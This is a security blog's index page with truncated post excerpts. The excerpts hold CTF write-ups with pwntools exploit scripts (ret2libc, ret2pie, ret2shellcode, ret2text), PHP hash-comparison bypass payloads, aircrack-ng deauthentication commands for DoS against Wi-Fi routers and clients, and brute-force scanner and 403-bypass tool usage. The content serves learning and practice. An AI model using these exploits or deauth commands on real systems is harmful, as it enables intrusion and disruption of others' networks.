avatar
文章
324
标签
30
分类
0

Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About
The Blog of Monoceros406
搜索
Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About

The Blog of Monoceros406

Web入门-PHP中MD5与SHA1绕过
发表于2024-01-26|Web
Web入门-PHP中MD5与SHA1绕过基础知识弱比较绕过PHP将哈希字符串开头为0e的解释为0。 md5加密后0e开头的: 12345678QLTHNDTQNKCDZO240610708s878926199as155964671as214587387as214587387a0e215962017 sha1加密后0e开头的: 123456aaroZmOkaaK1STfYaaO8zKZFaa3OFF9m0e129063370410932435112 双重md5加密后0e开头的: 1237r4lGXCH2Ksu2JNT3BYMCbDLytmyGm2xQyaLNhWn770hQgrBOjrcqftrlaZk 数组绕过/强比较绕过md5与sha1无法处理数组,都返回NULL。payload: 1?a[]=1&b[]=2 MD5碰撞123if((string)$_POST['a']!==(string)$_POST['b'] && md5($_POST['a'])===md5($_POST[&# ...
URLFinder基础操作
发表于2024-01-26|渗透测试
URLFinder基础操作用途查找隐藏在页面或js中的敏感或未授权api接口。 常用参数 -u 目标URL -s 显示指定状态码,all全部 -m 默认1正常抓取 2深入抓取(url只深入一层防抓偏) 3安全深入抓取(过滤delete、remove等敏感路由) -f 从文件中批量读取URL抓取 -o 结果导出csv文件 常见用法123URLFinder -u http://www.baidu.com -s all -m 2URLFinder -u http://www.baidu.com -s 200,403 -m 2URLFinder -s all -m 2 -f url.txt -o .
PWN入门-ret2libc做题
发表于2024-01-26|PWN
PWN入门-ret2libc做题[2021 鹤城杯]babyof将puts的got表地址传给rdi,返回到puts的plt表上,将puts的got表地址泄漏,最后再返回到main上。 libc查出bin/sh和system的相对偏移,再构造新利用链打。 可惜垃圾libcsearcher没有这个libc版本,得在线查。 12345678910111213141516171819202122232425262728293031from pwn import *from LibcSearcher import *import structcontext(log_level='debug',os='linux',arch='amd64')elf=ELF('./babyof')p=remote("node4.anna.nssctf.cn",28930)p.recvuntil("Do you know how to do buffer overflow?\n")stac ...
PWN入门-ret2pie做题
发表于2024-01-26|PWN
PWN入门-ret2pie做题[NISACTF 2022]ezpiePIE保护时基地址随机,先泄漏main地址,直接给了。计算偏移算shell函数地址。 123456789101112from pwn import *context(log_level='debug',os='linux',arch='i386')p=remote("node5.anna.nssctf.cn",28166)p.recvuntil("0x") #地址前缀0xmain_addr=int(p.recv(8),16) #8位地址以16进制形式读p.recvuntil("Input:")elf_base=main_addr-0x770 #计算偏移stack_overflow=b'a'*(0x28+4)shell_addr=p32(elf_base+0x80f) #求真实shell地址payload1=flat([stack_overflow,shell_addr])p.sen ...
PWN入门-ret2shellcode做题
发表于2024-01-26|PWN
PWN入门-ret2shellcode做题[HNCTF 2022 Week1]ret2shellcode123456789from pwn import *context(log_level='debug',os='linux',arch='amd64')p=remote("node5.anna.nssctf.cn",28261)elf=ELF('./attachment')shellcode=asm(shellcraft.sh()).ljust(0x108,b'a')buff_addr=p64(elf.sym["buff"])payload1=flat([shellcode,buff_addr])p.sendline(payload1)p.interactive() [GDOUCTF 2023]Shellcode123456789101112131415161718# 64位短shellcode 23字节:\x48\x31\xf6\x56\x4 ...
PWN入门-ret2text做题
发表于2024-01-26|PWN
PWN入门-ret2text做题[SWPUCTF 2021 新生赛]gift_pwn1checksec 文件名 开启堆栈不可执行保护(NX),不会把堆栈上数据当成指令来执行。 没有canary保护,可利用栈溢出来修改eip。 PIE地址随机花没有开启。 12345from pwn import *p=remote('node4.anna.nssctf.cn',28708)payload=b'a'*0x10+b'a'*8+p64(0x4005B6) #32位+4 64位+8p.sendline(payload)p.interactive() [CISCN 2019华北]PWN1123456from pwn import *context(log_level='debug',arch='amd64',os='linux')p=process('./attachment')payload=b'a'*0x2c+p64(0x ...
对无线路由发起DoS攻击
发表于2024-01-26|渗透测试
对无线路由发起DoS攻击先断开连接,查看附近所有WiFi: 1airodump-ng wlan0 记录目标MAC地址,尝试攻击,“-0 0”表示无限次数攻击: 1aireplay-ng -0 0 -a MAC地址 wlan0 很有可能本机与目标路由不在同一信道,尝试更改信道: 1iwconfig wlan0 channel 目标信道 以上流程适用于攻击该无线路由,以下方法为针对目标终端。 查看都有哪些终端连接到该无线路由: 1airodump-ng --bssid 无线路由MAC地址 wlan0 嗅探到目标终端的MAC地址后,再次确认是否在同一信道,尝试进行攻击: 1aireply-ng -0 0 -a 无线路由MAC地址 -c 目标终端MAC地址 wlan0
Kscan初探
发表于2024-01-26|渗透测试
Kscan初探端口扫描: 1kscan -t 192.168.217.1/24 存活网段探测: 1kscan --spy FOFA检索: 1kscan -f 'title="后台管理"' --fofa-size 15 暴力破解: 1kscan -t 127.0.0.1 --hydra CDN识别: 1kscan -t www.iywaobt.cn
Forbidden_buster初探
发表于2024-01-26|渗透测试
Forbidden_buster初探基本方法利用各种技术方法和Header测试绕过401、403访问控制限制。 1forbidden_buster -u http://example.com 常用参数 -u | –url 待测Web应用程序完整URL路径 -m | –method 测试方法 默认GET -H | –header 添加一个自定义Header -d | –data 向请求体中添加数据 支持JSON -p | –proxy 使用代理 –include-api API模糊测试 –include-unicode Unicode模糊测试 速度慢 –include-user-agent User-Agent模糊测试 速度慢 进阶方法1forbidden_buster --url "https://example.com/api/v1/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\ ...
恶意代码分析实战
发表于2024-01-22|恶意代码
恶意代码分析实战静态分析查看可执行文件/DLL文件编译时间:PETool查看PE文件头,找到_IMAGE_NT_HEADERS.FileHeader.TimeDateStamp。 当导入表存在WS2_32.dll,则有联网行为。ADVAPI32.dll中存在创建服务和提权API。ole32.dll可创建COM实例。 通用脱壳机linxerUnpacker可脱FSG壳。 判断PE文件为EXE还是DLL:PETools文件头->特征值,看DLL复选框是否勾选。 恶意代码检测Vmware原理:in(0xED)指令与魔术字符串“VMXH”进行检测。另一种遍历HKLM\SYSTEM\CurrentControlSet\Control\Device以查找vmware值。也有其他各种老六行为。 CreateToolhelp32Snapshot进程、线程拍摄快照。 动态分析运行DLL: 1rundll32 *.dll,导出表函数名 用RegShot记录注册表操作。注册表创建服务路径:HKLM\SYSTEM\ControlSet001\Services\服务名,重要参数:ImagePa ...
1…202122…33
avatar
Monoceros406
Windows系统安全爱好者
文章
324
标签
30
分类
0
Follow Me
公告
哪里排版出锅了请告诉我QwQ QQ:1295625063
最新文章
C++后端开发入门-FTP服务器与Libevent初探2025-06-01
C++后端开发入门-HTTP服务器编程2025-05-31
C++后端开发入门-服务器模型编程2025-05-31
C++后端开发入门-UDP与原始套接字编程2025-05-25
C++后端开发入门-TCP服务器编程2025-05-19
标签
漏洞复现 数学建模 编程语言 PWN 解题报告 Win内核安全 Web3 Web 恶意代码 沙盒逃逸 渗透测试 OpenSSL Win驱动开发 C++ 其他 Win系统调试 密码学 WinAPI AWD Python GUI开发 后端开发 算法 Misc 取证 IoT 前端开发 逆向工程 UEFI 移动安全
归档
  • 六月 20251
  • 五月 20259
  • 十二月 202413
  • 十一月 202412
  • 十月 202420
  • 九月 20243
  • 八月 20248
  • 七月 202413
网站资讯
文章数目 :
324
已运行时间 :
本站访客数 :
本站总访问量 :
最后更新时间 :
©2020 - 2025 By Monoceros406
框架 Hexo|主题 Butterfly